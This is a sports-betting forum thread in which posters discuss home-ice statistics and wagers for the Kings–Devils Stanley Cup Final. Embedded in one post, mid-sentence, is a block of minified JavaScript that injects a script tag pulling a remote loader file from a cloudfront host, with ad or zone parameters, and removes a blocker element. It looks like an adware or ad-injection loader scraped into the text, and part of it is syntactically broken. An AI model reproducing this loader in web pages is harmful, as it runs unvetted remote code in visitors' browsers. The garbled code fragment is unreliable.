Home team won the 1st 6 in the Pit-Det deries
Home Team won the 1st 5 in the Chi-Phi series
Home team won the 1st 6 in the Bos-Van series

Just a stat.

Also since 2006 The home team has jumped to a 2-0 series lead every season.

wow, I didn't know of that dominance.... I'm starting to feel uneasy about my bet for Kings to win the cup, I didn't want to do it but I might hedge

NO TEAM has done on the road what the KIngs have done this postseason... and it will continue. Pile up on NJ... The books need the donations.

I'd be interested to know what the longest sequence of SCFs is, that has seen the home team start 2-0. '06 to '11 is 6 straight seasons of the home team starting 2-0.

http://www.youtube.com/watch?v=krD4hdGvGHM&feature=youtu.be BUT the Kings haven't LOST a road game these playoffs and the Devils are no slouch on the road either going 6-4 and 4-2 since the 1st round. IF one team doesn't "get on a roll" and sweep or win in 5 (which I think could very well happen), then you could be looking at a "reverse 2003" where the Ducks and Devils WON every one of their HOME game. THIS time it could be the ROAD team winning

skubishak.....there is no such thing as a donation to the bookies...your mentality will never make you profit in sports.

nothing is guaranteed...bet the kings...the devils could win..bet the devils...the kings can win. there's no such thing as fate and there no such thing as a lock. this is anyone's game and frankly I'd suspect the over. if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

ON that Home team stat as well.     These teams are both pretty good.    On one end you have Brodeur and the experience of the NJDevils.   On the other you have a young  and excited LAKings team.   Have to lean on experience, seasoned vets and the HOME team here.    should be a great and long series.    I say they split and go back to LA with series tied 1-1
